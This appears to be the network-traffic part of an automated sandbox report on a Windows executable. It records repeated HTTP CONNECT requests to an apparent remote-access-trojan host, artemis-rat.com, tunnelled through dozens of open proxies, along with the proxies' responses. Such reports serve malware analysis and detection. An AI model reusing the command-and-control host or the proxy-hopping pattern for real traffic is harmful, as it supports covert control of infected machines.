                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            719192.168.2.54982350.63.12.33224503876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.470930099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.490483046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.514638901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.641419888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            720192.168.2.551274194.124.36.2880803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.472105980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.405374050 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            721192.168.2.551303178.94.231.9331283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.472105980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.097388029 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            722192.168.2.551710117.160.250.131803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.473582029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.108141899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.064898014 CET303INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.934864998 CET303INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            723192.168.2.54974794.231.199.22619713876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.473608971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.490453005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.514637947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.025557995 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            724192.168.2.551912171.235.166.22240193876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.479670048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.895592928 CET39INHTTP/1.0 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.939320087 CET253INHTTP/1.0 500 Internal Error
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 45 72 72 6f 72 3c 2f 68 32 3e 3c 68 33 3e 49 6e 74 65 72 6e 61 6c 20 70 72 6f 78 79 20 65 72 72 6f 72 20 64 75 72 69 6e 67 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>500 Internal Error</title></head><body><h2>500 Internal Error</h2><h3>Internal proxy error during processing your request</h3></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            725192.168.2.55207938.54.95.1990803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.480660915 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.703011990 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.843003035 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.186225891 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.839272976 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.213911057 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.970248938 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:25.725948095 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:08.734045029 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            726192.168.2.549759212.154.82.5290903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.480725050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.490422964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.514622927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.641412973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.312625885 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            727192.168.2.552025121.159.146.251803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.480792999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            728192.168.2.552036146.56.154.83210003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.481528997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            729192.168.2.551998114.132.202.24680803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.482682943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.035099983 CET84INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            730192.168.2.55214252.35.240.11910803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.484087944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.892859936 CET65INHTTP/1.1 200 Connection Established
                                                                                                                                                                                                                                                            Content-Type: text/plain


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            731192.168.2.55202691.107.180.250803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.484090090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.792809963 CET343INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            732192.168.2.55203058.234.116.197803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.485212088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            733192.168.2.552011120.76.42.20988883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.486428022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            734192.168.2.55204858.234.116.19781973876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.488076925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            735192.168.2.552165104.17.9.114803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.488079071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.642817974 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            736192.168.2.552154162.241.158.204467833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.488945961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            737192.168.2.552199104.27.122.6803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.489140034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
